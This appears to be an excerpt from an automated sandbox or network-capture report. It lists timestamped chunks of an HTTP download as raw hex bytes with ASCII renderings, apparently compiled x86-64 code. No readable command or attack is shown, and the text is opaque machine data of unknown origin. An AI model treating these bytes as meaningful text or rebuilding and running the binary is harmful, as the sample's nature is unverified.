                                                                                                                                                            2022-07-07 07:51:09 UTC24INData Raw: d5 49 8b cc ff 15 44 1b 09 00 49 8b 9e 28 02 00 00 48 85 db 0f 85 9d 03 03 00 49 8b 9e 18 02 00 00 48 85 db 0f 84 4c 1c 03 00 4c 8b 43 08 4c 3b c5 0f 85 49 10 00 00 4d 85 c0 74 24 48 8b 13 49 8b cc 0f 1f 40 00 0f b7 01 66 39 02 0f 85 2e 10 00 00 48 83 c2 02 48 83 c1 02 49 83 e8 01 75 e6 83 06 ff 75 10 49 8b cc e8 99 08 01 00 48 8b ce e8 91 08 01 00 48 85 db 0f 84 02 1c 03 00 8b 43 28 8b 73 24 48 63 5b 20 8b 17 33 ed 89 44 24 70 49 8b 45 08 44 8d 42 01 48 89 ac 24 a8 00 00 00 48 8b 0c d0 41 8b 86 3c 02 00 00 48 89 ac 24 b0 00 00 00 44 0f bf 59 0a 44 89 07 89 84 24 e8 00 00 00 48 8d 05 55 c2 09 00 48 8d 0d 06 85 09 00 89 6c 24 30 c7 44 24 38 01 00 00 00 48 89 6c 24 40 48 89 84 24 c8 00 00 00 49 8b 45 08 48 89 8c 24 a0 00 00 00 4c 8b f5 4a 8b 0c c0 48 89 ac
                                                                                                                                                            Data Ascii: IDI(HIHLLCL;IMt$HI@f9.HHIuuIHHC(s$Hc[ 3D$pIEDBH$HA<H$DYD$HUHl$0D$8Hl$@H$IEH$LJH
                                                                                                                                                            2022-07-07 07:51:09 UTC25INData Raw: 06 03 00 44 38 15 3c 03 0c 00 0f 85 2d 06 03 00 4d 39 17 0f 84 e0 00 00 00 8b 05 ae 21 0c 00 40 32 ed a8 01 0f 84 21 06 03 00 4c 89 15 94 21 0c 00 4c 89 15 85 21 0c 00 48 8d 3d 4e 21 0c 00 48 8d 35 47 21 0c 00 49 8b 1f 4d 8b 44 24 08 48 8b 43 08 4d 85 c0 0f 84 1d 06 03 00 48 85 c0 0f 84 1d 06 03 00 4c 3b c0 0f 82 32 06 03 00 4d 85 c0 0f 84 21 06 03 00 48 8b 0b 49 8b 14 24 0f b7 01 66 39 02 75 13 48 83 c2 02 48 83 c1 02 49 83 e8 01 75 ea e9 ff 05 03 00 0f 82 f1 05 03 00 b8 01 00 00 00 85 c0 0f 88 09 06 03 00 0f 8e ac 06 03 00 48 8b 4b 38 48 85 c9 0f 85 51 06 03 00 49 8b 07 48 8b 48 30 48 89 4e 38 49 8b 07 48 8b 48 38 48 89 4f 30 49 8b 0f 48 8b 05 e7 20 0c 00 48 89 41 30 49 8b 0f 48 8b 05 d1 20 0c 00 48 89 41 38 40 84 ed 0f 85 6c 06 03 00 b9 40 00 00 00 41
                                                                                                                                                            Data Ascii: D8<-M9!@2!L!L!H=N!H5G!IMD$HCMHL;2M!HI$f9uHHIuHK8HQIHH0HN8IHH8HO0IH HA0IH HA8@l@A
                                                                                                                                                            2022-07-07 07:51:09 UTC27INData Raw: 84 8c 09 03 00 44 88 20 49 8b 07 48 63 58 04 42 80 7c 3b 19 00 0f 85 3d 07 03 00 4a 8b 5c 3b 10 48 8b b4 24 a8 01 00 00 48 3b f3 0f 84 8d 00 00 00 48 8b 4e 10 48 85 c9 0f 85 28 07 03 00 33 ff 8b 46 08 83 f8 08 0f 84 2d 07 03 00 83 f8 0a 0f 84 44 07 03 00 83 f8 05 0f 84 55 07 03 00 83 f8 0b 0f 84 5a 07 03 00 83 f8 0c 0f 84 6b 07 03 00 44 89 66 08 89 3e 8b 43 08 89 46 08 83 f8 04 0f 85 70 07 03 00 8d 48 1c e8 3f 02 01 00 48 85 c0 0f 84 f3 08 03 00 48 8b 53 10 48 8b 0a 48 89 08 48 8b 4a 08 48 89 48 08 48 8b 4a 10 48 89 48 10 48 8b 4a 18 48 89 48 18 ff 01 48 89 46 10 33 f6 49 8b 07 48 63 48 04 42 80 7c 39 19 00 4a 8d 5c 39 08 0f 85 d9 08 03 00 48 8b 4b 08 80 79 20 00 0f 85 d8 08 03 00 80 7b 11 00 0f 85 e7 08 03 00 48 8b 4b 08 80 79 40 00 0f 85 e6 08 03 00 49
                                                                                                                                                            Data Ascii: D IHcXB|;=J\;H$H;HNH(3F-DUZkDf>CFpH?HHSHHHJHHHJHHHJHHHF3IHcHB|9J\9HKy {HKy@I
                                                                                                                                                            2022-07-07 07:51:09 UTC28INData Raw: 84 d3 0b 03 00 83 f8 0a 0f 84 ea 0b 03 00 83 f8 05 0f 84 fd 0b 03 00 83 f8 0b 0f 84 02 0c 03 00 83 f8 0c 0f 84 13 0c 03 00 48 8b cb c7 43 08 01 00 00 00 89 33 e8 c1 f8 00 00 48 8b 84 24 a8 00 00 00 48 ff c7 48 3b fd 0f 82 74 ff ff ff 48 8b 8c 24 a8 00 00 00 e8 a0 f8 00 00 33 c0 48 81 c4 48 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 33 f6 eb 84 48 8b 5b 30 48 85 db 0f 85 9d ef ff ff e9 e4 0b 03 00 4d 03 ff 49 83 ff 04 73 06 41 bf 04 00 00 00 48 c7 c1 ff ff ff ff b8 08 00 00 00 4c 89 bc 24 e0 00 00 00 49 f7 e7 48 0f 40 c1 48 8b c8 e8 ba fc 00 00 4c 8b 84 24 d8 00 00 00 48 8b 94 24 d0 00 00 00 49 c1 e0 03 48 8b c8 48 8b d8 e8 d3 f4 00 00 48 8b 8c 24 d0 00 00 00 e8 16 f8 00 00 48 89 9c 24 d0 00 00 00 48 8b 9c 24 d8 00 00 00 e9 39 f1 ff ff 4d 03 f6 49 83
                                                                                                                                                            Data Ascii: HC3H$HH;tH$3HHA_A^A]A\_^][3H[0HMIsAHL$IH@HL$H$IHHH$H$H$9MI
                                                                                                                                                            2022-07-07 07:51:09 UTC29INData Raw: 03 00 83 bc 24 a8 00 00 00 12 0f 84 b3 31 03 00 48 8d 94 24 a0 00 00 00 48 8d 0d 23 f3 0b 00 e8 ae a0 00 00 85 c0 75 34 48 8d 94 24 a0 00 00 00 48 8d 0d 0b f3 0b 00 e8 46 a0 00 00 85 c0 75 1c 48 8d 8c 24 a0 00 00 00 ff 15 a4 03 09 00 48 8d 8c 24 a0 00 00 00 ff 15 8e 03 09 00 48 8d 8c 24 a0 00 00 00 45 33 c9 45 33 c0 33 d2 c7 44 24 20 01 00 00 00 ff 15 80 03 09 00 85 c0 0f 84 59 fc ff ff e9 7b ff ff ff e8 06 cb 00 00 e9 c2 fb ff ff 83 bf c4 01 00 00 02 0f 85 46 39 03 00 c6 87 38 02 00 00 01 44 89 af c4 01 00 00 e9 4f fd ff ff 48 8b cf e8 69 ca 00 00 80 bf c8 01 00 00 01 0f 84 72 fe ff ff 48 8b cf e8 b4 a4 ff ff 33 c9 ff 15 bc 06 09 00 48 8b 0d 4d dd 0a 00 ff 15 8f 04 09 00 48 8d 8c 24 20 01 00 00 45 33 c9 45 33 c0 33 d2 ff 15 89 06 09 00 85 c0 0f 8e 37 fe
                                                                                                                                                            Data Ascii: $1H$H#u4H$HFuH$H$H$E3E33D$ Y{F98DOHirH3HMH$ E3E337
                                                                                                                                                            2022-07-07 07:51:09 UTC31INData Raw: 55 d0 02 00 45 89 4b 18 45 89 4b 20 49 8d 43 20 4d 89 63 e0 4c 8b e2 4d 8d 4b 18 4d 8b c2 48 8b d6 49 89 43 a8 e8 7f 83 00 00 85 c0 0f 85 48 d0 02 00 48 89 9c 24 80 00 00 00 48 8b 9c 24 a0 00 00 00 48 89 7c 24 60 8b bc 24 98 00 00 00 4c 89 6c 24 50 45 33 ed 44 89 2b 39 bc 24 90 00 00 00 0f 83 a2 00 00 00 48 8d 54 24 30 49 8b cc 44 89 6c 24 30 c7 44 24 38 01 00 00 00 4c 89 6c 24 40 e8 14 cd ff ff 4d 8b 5c 24 10 49 8b 44 24 08 4c 8d 84 24 90 00 00 00 4e 8b 4c d8 f8 48 8b d6 48 8b cd 89 7c 24 20 e8 3e da ff ff 85 c0 0f 85 eb cf 02 00 8b 94 24 90 00 00 00 ff 03 3b d7 74 3e 48 8b 46 08 48 8b 0c d0 66 83 79 08 40 0f 85 b1 cf 02 00 8d 42 01 3b c7 0f 84 a6 cf 02 00 48 8d 4c 24 30 89 84 24 90 00 00 00 e8 3a fd ff ff 39 bc 24 90 00 00 00 0f 82 6a ff ff ff eb 0a 48
                                                                                                                                                            Data Ascii: UEKEK IC McLMKMHICHH$H$H|$`$Ll$PE3D+9$HT$0IDl$0D$8Ll$@M\$ID$L$NLHH|$ >$;t>HFHfy@B;HL$0$:9$jH
                                                                                                                                                            2022-07-07 07:51:09 UTC32INData Raw: 14 0b 00 49 8b 41 08 4c 89 14 24 48 89 87 30 14 0b 00 89 5c 24 08 89 5c 24 0c c7 05 a4 92 0a 00 01 00 00 00 c7 05 9e 92 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 1f 92 09 00 48 89 05 90 92 0a 00 49 8b 01 48 89 87 48 14 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 14 0b 00 89 5c 24 0c c7 05 81 92 0a 00 01 00 00 00 c7 05 7b 92 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 b4 91 09 00 48 89 05 6d 92 0a 00 48 8d 05 46 29 06 00 48 89 04 24 49 8b 01 48 89 87 68 14 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 70 14 0b 00 48 8d 05 5a 91 09 00 89 5c 24 08 48 89 05 57 92 0a 00 48 8d 05 60 29 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 89 1d 37 92 0a 00 89 1d 35 92 0a 00 48 89 87 88 14 0b 00 49 8b 41 08 48 89 87 90 14 0b 00 48 8d 05 08 91 09 00 c7 05 2e 92 0a 00 01 00 00 00 48 89 05 2f 92
                                                                                                                                                            Data Ascii: IAL$H0\$\$L$HHIHHIA\$HP\${L$HHmHF)H$IHhIAL$HpHZ\$HWH`)\$H$I75HIAHH.H/
                                                                                                                                                            2022-07-07 07:51:09 UTC33INData Raw: 5c 24 08 48 89 87 f0 15 0b 00 89 5c 24 0c 4c 8d 0c 24 48 8d 05 be 8c 09 00 c7 05 2c 90 0a 00 02 00 00 00 c7 05 26 90 0a 00 ff 00 00 00 48 89 05 23 90 0a 00 48 8d 05 0c 25 06 00 48 89 04 24 49 8b 01 48 89 87 08 16 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 10 16 0b 00 48 8d 05 28 41 09 00 89 5c 24 08 48 89 05 0d 90 0a 00 48 8d 05 c6 fd 04 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 e9 8f 0a 00 01 00 00 00 c7 05 e3 8f 0a 00 01 00 00 00 48 89 87 28 16 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 16 0b 00 89 5c 24 0c c7 05 db 8f 0a 00 01 00 00 00 c7 05 d5 8f 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 fe 8b 09 00 48 89 05 c7 8f 0a 00 48 8d 05 60 b9 08 00 48 89 04 24 49 8b 01 48 89 87 48 16 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 16 0b 00 89 5c 24 0c c7 05 ad 8f 0a 00 01
                                                                                                                                                            Data Ascii: \$H\$L$H,&H#H%H$IHIAL$HH(A\$HH\$H$IH(IA\$H0\$L$HHH`H$IHHIA\$HP\$
                                                                                                                                                            2022-07-07 07:51:09 UTC35INData Raw: 8a 32 08 00 48 89 04 24 49 8b 01 48 89 87 28 18 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 18 0b 00 89 5c 24 0c c7 05 07 8d 0a 00 01 00 00 00 c7 05 01 8d 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 8a 85 09 00 48 89 05 f3 8c 0a 00 48 8d 05 bc 47 08 00 48 89 04 24 49 8b 01 48 89 87 48 18 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 50 18 0b 00 48 8d 05 38 85 09 00 89 5c 24 08 48 89 05 dd 8c 0a 00 48 8d 05 b6 57 08 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 b9 8c 0a 00 03 00 00 00 c7 05 b3 8c 0a 00 03 00 00 00 48 89 87 68 18 0b 00 49 8b 41 08 48 89 87 70 18 0b 00 48 8d 05 ce 84 09 00 c7 05 ac 8c 0a 00 03 00 00 00 48 89 05 ad 8c 0a 00 48 8d 05 a6 58 08 00 c7 05 98 8c 0a 00 03 00 00 00 48 89 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48 89 87 88 18 0b 00 49 8b 41
                                                                                                                                                            Data Ascii: 2H$IH(IA\$H0\$L$HHHGH$IHHIAL$HPH8\$HHW\$H$IHhIAHpHHHXH$\$\$L$IHIA
                                                                                                                                                            2022-07-07 07:51:09 UTC36INData Raw: 01 00 00 00 c7 05 f3 89 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 d4 7e 09 00 48 89 05 e5 89 0a 00 48 8d 05 5e e7 07 00 48 89 04 24 49 8b 01 48 89 87 68 1a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 1a 0b 00 89 5c 24 0c c7 05 cb 89 0a 00 03 00 00 00 c7 05 c5 89 0a 00 43 00 00 00 4c 8d 0c 24 48 8d 05 66 7e 09 00 48 89 05 b7 89 0a 00 48 8d 05 f0 e4 05 00 48 89 04 24 49 8b 01 48 89 87 88 1a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 1a 0b 00 89 5c 24 0c c7 05 9d 89 0a 00 01 00 00 00 c7 05 97 89 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 f0 7d 09 00 48 89 05 89 89 0a 00 48 8d 05 22 e4 05 00 48 89 04 24 49 8b 01 48 89 87 a8 1a 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 b0 1a 0b 00 48 8d 05 96 7d 09 00 89 5c 24 08 48 89 05 73 89 0a 00 48 8d 05 3c 87 07 00 89 5c 24 0c 48 89
                                                                                                                                                            Data Ascii: L$H~HH^H$IHhIA\$Hp\$CL$Hf~HHH$IHIA\$H\$L$H}HH"H$IHIAL$HH}\$HsH<\$H
                                                                                                                                                            2022-07-07 07:51:09 UTC37INData Raw: 49 8b 01 48 89 87 88 1c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 1c 0b 00 89 5c 24 0c c7 05 bd 86 0a 00 01 00 00 00 c7 05 b7 86 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 18 77 09 00 48 89 05 a9 86 0a 00 48 8d 05 12 f9 06 00 48 89 04 24 49 8b 01 48 89 87 a8 1c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 1c 0b 00 89 5c 24 0c c7 05 8f 86 0a 00 01 00 00 00 c7 05 89 86 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 aa 76 09 00 48 89 05 7b 86 0a 00 48 8d 05 f4 51 06 00 48 89 04 24 49 8b 01 48 89 87 c8 1c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 1c 0b 00 89 5c 24 0c c7 05 61 86 0a 00 02 00 00 00 c7 05 5b 86 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 3c 76 09 00 48 89 05 4d 86 0a 00 48 8d 05 76 57 06 00 48 89 04 24 49 8b 01 48 89 87 e8 1c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87
                                                                                                                                                            Data Ascii: IHIA\$H\$L$HwHHH$IHIA\$H\$L$HvH{HQH$IHIA\$H\$a[L$H<vHMHvWH$IHIA\$H
                                                                                                                                                            2022-07-07 07:51:09 UTC39INData Raw: 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 48 8d 05 40 f2 06 00 48 89 04 24 49 8b 01 48 89 87 c8 1e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 1e 0b 00 89 5c 24 0c c7 05 8d 83 0a 00 01 00 00 00 c7 05 87 83 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 e0 6f 09 00 48 89 05 79 83 0a 00 48 8d 05 22 41 06 00 48 89 04 24 49 8b 01 48 89 87 e8 1e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 1e 0b 00 89 5c 24 0c c7 05 5f 83 0a 00 01 00 00 00 c7 05 59 83 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 6a 6f 09 00 48 89 05 4b 83 0a 00 48 8d 05 54 43 06 00 48 89 04 24 49 8b 01 48 89 87 08 1f 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 1f 0b 00 89 5c 24 0c c7 05 31 83 0a 00 01 00 00 00 c7 05 2b 83 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 f4 6e 09 00 48 89 05 1d 83 0a 00 48 8d 05 c6 f1 06 00 48 89
                                                                                                                                                            Data Ascii: \$\$L$H@H$IHIA\$H\$L$HoHyH"AH$IHIA\$H\$_YL$HjoHKHTCH$IHIA\$H\$1+L$HnHHH
                                                                                                                                                            2022-07-07 07:51:09 UTC40INData Raw: 87 f0 20 0b 00 48 8d 05 d6 68 09 00 89 5c 24 08 48 89 05 83 80 0a 00 48 8d 05 4c 7b 07 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 5f 80 0a 00 03 00 00 00 c7 05 59 80 0a 00 06 00 00 00 48 89 87 08 21 0b 00 49 8b 41 08 48 89 87 10 21 0b 00 89 5c 24 08 89 5c 24 0c c7 05 51 80 0a 00 01 00 00 00 c7 05 4b 80 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 4c 68 09 00 48 89 05 3d 80 0a 00 48 8d 05 16 7d 07 00 48 89 04 24 49 8b 01 48 89 87 28 21 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 21 0b 00 89 5c 24 0c c7 05 23 80 0a 00 01 00 00 00 c7 05 1d 80 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 e6 67 09 00 48 89 05 0f 80 0a 00 48 8d 05 f8 44 06 00 48 89 04 24 49 8b 01 48 89 87 48 21 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 21 0b 00 89 5c 24 0c c7 05 f5 7f 0a 00 01 00 00 00 c7 05
                                                                                                                                                            Data Ascii: Hh\$HHL{\$H$I_YH!IAH!\$\$QKL$HLhH=H}H$IH(!IA\$H0!\$#L$HgHHDH$IHH!IA\$HP!\$
                                                                                                                                                            2022-07-07 07:51:09 UTC41INData Raw: 48 8d 05 2a 6e 08 00 48 89 04 24 49 8b 01 48 89 87 28 23 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 30 23 0b 00 89 5c 24 08 89 5c 24 0c 48 8d 05 06 61 09 00 c7 05 3c 7d 0a 00 03 00 00 00 c7 05 36 7d 0a 00 07 00 00 00 48 89 05 33 7d 0a 00 48 8d 05 cc 6d 08 00 48 89 04 24 49 8b 01 48 89 87 48 23 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 23 0b 00 48 8d 05 98 60 09 00 89 5c 24 0c 48 89 05 1d 7d 0a 00 48 8d 05 86 6d 08 00 89 1d 08 7d 0a 00 c7 05 02 7d 0a 00 01 00 00 00 4c 8d 0c 24 48 89 04 24 49 8b 01 48 89 87 68 23 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 23 0b 00 89 5c 24 0c c7 05 ef 7c 0a 00 03 00 00 00 c7 05 e9 7c 0a 00 07 00 00 00 4c 8d 0c 24 48 8d 05 0a 60 09 00 48 89 05 db 7c 0a 00 48 8d 05 d4 6b 08 00 48 89 04 24 49 8b 01 48 89 87 88 23 0b 00 49 8b 41 08
                                                                                                                                                            Data Ascii: H*nH$IH(#IAL$H0#\$\$Ha<}6}H3}HmH$IHH#IA\$HP#H`\$H}Hm}}L$H$IHh#IA\$Hp#\$||L$H`H|HkH$IH#IA
                                                                                                                                                            2022-07-07 07:51:09 UTC43INData Raw: 00 07 00 00 00 4c 8d 0c 24 48 8d 05 f0 58 09 00 48 89 05 31 7a 0a 00 48 8d 05 ca 67 08 00 48 89 04 24 49 8b 01 48 89 87 68 25 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 25 0b 00 89 5c 24 0c c7 05 17 7a 0a 00 02 00 00 00 c7 05 11 7a 0a 00 06 00 00 00 4c 8d 0c 24 48 8d 05 7a 58 09 00 48 89 05 03 7a 0a 00 48 8d 05 5c 67 08 00 48 89 04 24 49 8b 01 48 89 87 88 25 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 90 25 0b 00 48 8d 05 20 58 09 00 89 5c 24 08 48 89 05 ed 79 0a 00 48 8d 05 36 67 08 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 c9 79 0a 00 03 00 00 00 c7 05 c3 79 0a 00 07 00 00 00 48 89 87 a8 25 0b 00 49 8b 41 08 48 89 87 b0 25 0b 00 48 8d 05 ae 57 09 00 c7 05 bc 79 0a 00 02 00 00 00 48 89 05 bd 79 0a 00 48 8d 05 c6 66 08 00 c7 05 a8 79 0a 00 06 00 00 00 48 89 04
                                                                                                                                                            Data Ascii: L$HXH1zHgH$IHh%IA\$Hp%\$zzL$HzXHzH\gH$IH%IAL$H%H X\$HyH6g\$H$IyyH%IAH%HWyHyHfyH
                                                                                                                                                            2022-07-07 07:51:09 UTC44INData Raw: 08 89 5c 24 08 48 89 87 90 27 0b 00 89 5c 24 0c c7 05 0d 77 0a 00 02 00 00 00 c7 05 07 77 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 b0 50 09 00 48 89 05 f9 76 0a 00 48 8d 05 92 1c 06 00 48 89 04 24 49 8b 01 48 89 87 a8 27 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 27 0b 00 89 5c 24 0c c7 05 df 76 0a 00 02 00 00 00 c7 05 d9 76 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 42 50 09 00 48 89 05 cb 76 0a 00 48 8d 05 d4 1a 06 00 48 89 04 24 49 8b 01 48 89 87 c8 27 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 27 0b 00 89 5c 24 0c c7 05 b1 76 0a 00 02 00 00 00 c7 05 ab 76 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 c4 4f 09 00 48 89 05 9d 76 0a 00 48 8d 05 06 22 06 00 48 89 04 24 49 8b 01 48 89 87 e8 27 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 f0 27 0b 00 48 8d 05 6a 4f 09 00 89 5c
                                                                                                                                                            Data Ascii: \$H'\$wwL$HPHvHH$IH'IA\$H'\$vvL$HBPHvHH$IH'IA\$H'\$vvL$HOHvH"H$IH'IAL$H'HjO\
                                                                                                                                                            2022-07-07 07:51:09 UTC45INData Raw: 8d 05 20 e6 07 00 48 89 04 24 49 8b 01 48 89 87 c8 29 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 29 0b 00 89 5c 24 0c 89 1d e1 73 0a 00 c7 05 db 73 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 e4 48 09 00 48 89 05 cd 73 0a 00 48 8d 05 c6 d1 06 00 48 89 04 24 49 8b 01 48 89 87 e8 29 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 f0 29 0b 00 89 5c 24 0c c7 05 b3 73 0a 00 02 00 00 00 c7 05 ad 73 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 6e 48 09 00 48 89 05 9f 73 0a 00 48 8d 05 b8 df 07 00 48 89 04 24 49 8b 01 48 89 87 08 2a 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 2a 0b 00 89 5c 24 0c c7 05 85 73 0a 00 01 00 00 00 c7 05 7f 73 0a 00 02 00 00 00 4c 8d 0c 24 48 8d 05 00 48 09 00 48 89 05 71 73 0a 00 48 8d 05 ba 1d 06 00 48 89 04 24 49 8b 01 48 89 87 28 2a 0b 00 49 8b 41 08 89
                                                                                                                                                            Data Ascii: H$IH)IA\$H)\$ssL$HHHsHH$IH)IA\$H)\$ssL$HnHHsHH$IH*IA\$H*\$ssL$HHHqsHH$IH(*IA
                                                                                                                                                            2022-07-07 07:51:09 UTC47INData Raw: 89 05 d7 70 0a 00 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 48 8d 05 24 fe 05 00 48 89 04 24 49 8b 01 48 89 87 08 2c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 10 2c 0b 00 89 5c 24 0c c7 05 b1 70 0a 00 01 00 00 00 c7 05 ab 70 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 94 41 09 00 48 89 05 9d 70 0a 00 48 8d 05 06 05 06 00 48 89 04 24 49 8b 01 48 89 87 28 2c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 30 2c 0b 00 89 5c 24 0c c7 05 83 70 0a 00 01 00 00 00 c7 05 7d 70 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 36 41 09 00 48 89 05 6f 70 0a 00 48 8d 05 58 44 07 00 48 89 04 24 49 8b 01 48 89 87 48 2c 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 50 2c 0b 00 89 5c 24 0c c7 05 55 70 0a 00 01 00 00 00 c7 05 4f 70 0a 00 04 00 00 00 4c 8d 0c 24 48 8d 05 d0 40 09 00 48 89 05 41 70 0a 00 48 8d 05
                                                                                                                                                            Data Ascii: p\$\$L$H$H$IH,IA\$H,\$ppL$HAHpHH$IH(,IA\$H0,\$p}pL$H6AHopHXDH$IHH,IA\$HP,\$UpOpL$H@HApH
                                                                                                                                                            2022-07-07 07:51:09 UTC48INData Raw: 8d 05 fe 3a 09 00 89 5c 24 08 48 89 05 b3 6d 0a 00 48 8d 05 3c c9 05 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 8f 6d 0a 00 01 00 00 00 c7 05 89 6d 0a 00 01 00 00 00 48 89 87 48 2e 0b 00 49 8b 41 08 48 89 87 50 2e 0b 00 89 5c 24 08 89 5c 24 0c c7 05 81 6d 0a 00 01 00 00 00 c7 05 7b 6d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 7c 3a 09 00 48 89 05 6d 6d 0a 00 48 8d 05 86 cb 05 00 48 89 04 24 49 8b 01 48 89 87 68 2e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 2e 0b 00 89 5c 24 0c c7 05 53 6d 0a 00 01 00 00 00 c7 05 4d 6d 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 16 3a 09 00 48 89 05 3f 6d 0a 00 48 8d 05 b8 b3 05 00 48 89 04 24 49 8b 01 48 89 87 88 2e 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 90 2e 0b 00 89 5c 24 0c c7 05 25 6d 0a 00 01 00 00 00 c7 05 1f 6d 0a 00 01 00
                                                                                                                                                            Data Ascii: :\$HmH<\$H$ImmHH.IAHP.\$\$m{mL$H|:HmmHH$IHh.IA\$Hp.\$SmMmL$H:H?mHH$IH.IA\$H.\$%mm
                                                                                                                                                            2022-07-07 07:51:09 UTC49INData Raw: 24 49 8b 01 48 89 87 68 30 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 70 30 0b 00 89 5c 24 0c 48 8d 05 0e 34 09 00 48 89 05 7f 6a 0a 00 4c 8d 0c 24 48 8d 05 14 c7 07 00 48 89 04 24 49 8b 01 89 1d 5f 6a 0a 00 89 1d 5d 6a 0a 00 48 89 87 88 30 0b 00 49 8b 41 08 48 89 87 90 30 0b 00 48 8d 05 b8 33 09 00 89 5c 24 08 48 89 05 5d 6a 0a 00 48 8d 05 e6 bd 04 00 89 1d 48 6a 0a 00 c7 05 42 6a 0a 00 01 00 00 00 89 5c 24 0c 48 89 04 24 4c 8d 0c 24 49 8b 01 48 89 87 a8 30 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 30 0b 00 89 5c 24 0c c7 05 2b 6a 0a 00 02 00 00 00 c7 05 25 6a 0a 00 03 00 00 00 4c 8d 0c 24 48 8d 05 3e 33 09 00 48 89 05 17 6a 0a 00 48 8d 05 80 da 05 00 48 89 04 24 49 8b 01 48 89 87 c8 30 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 d0 30 0b 00 89 5c 24 0c c7 05 fd
                                                                                                                                                            Data Ascii: $IHh0IA\$Hp0\$H4HjL$HH$I_j]jH0IAH0H3\$H]jHHjBj\$H$L$IH0IA\$H0\$+j%jL$H>3HjHH$IH0IA\$H0\$
                                                                                                                                                            2022-07-07 07:51:09 UTC51INData Raw: 89 05 6c 67 0a 00 48 8d 05 c5 a8 05 00 48 89 04 24 49 8b 01 48 89 87 a8 32 0b 00 49 8b 41 08 89 5c 24 08 48 89 87 b0 32 0b 00 89 5c 24 0c c7 05 52 67 0a 00 01 00 00 00 c7 05 4c 67 0a 00 01 00 00 00 4c 8d 0c 24 48 8d 05 ed 2c 09 00 48 89 05 3e 67 0a 00 48 8d 05 47 88 06 00 48 89 04 24 49 8b 01 48 89 87 c8 32 0b 00 49 8b 41 08 4c 8d 0c 24 48 89 87 d0 32 0b 00 48 8d 05 9b 2c 09 00 89 5c 24 08 48 89 05 28 67 0a 00 48 8d 05 41 9c 06 00 89 5c 24 0c 48 89 04 24 49 8b 01 c7 05 04 67 0a 00 01 00 00 00 c7 05 fe 66 0a 00 01 00 00 00 48 89 87 e8 32 0b 00 49 8b 41 08 48 89 87 f0 32 0b 00 48 8d 05 31 2c 09 00 c7 05 f7 66 0a 00 01 00 00 00 48 89 05 f8 66 0a 00 48 8d 05 41 b2 05 00 c7 05 e3 66 0a 00 01 00 00 00 48 89 04 24 89 5c 24 08 89 5c 24 0c 4c 8d 0c 24 49 8b 01 48
                                                                                                                                                            Data Ascii: lgHH$IH2IA\$H2\$RgLgL$H,H>gHGH$IH2IAL$H2H,\$H(gHA\$H$IgfH2IAH2H1,fHfHAfH$\$\$L$IH
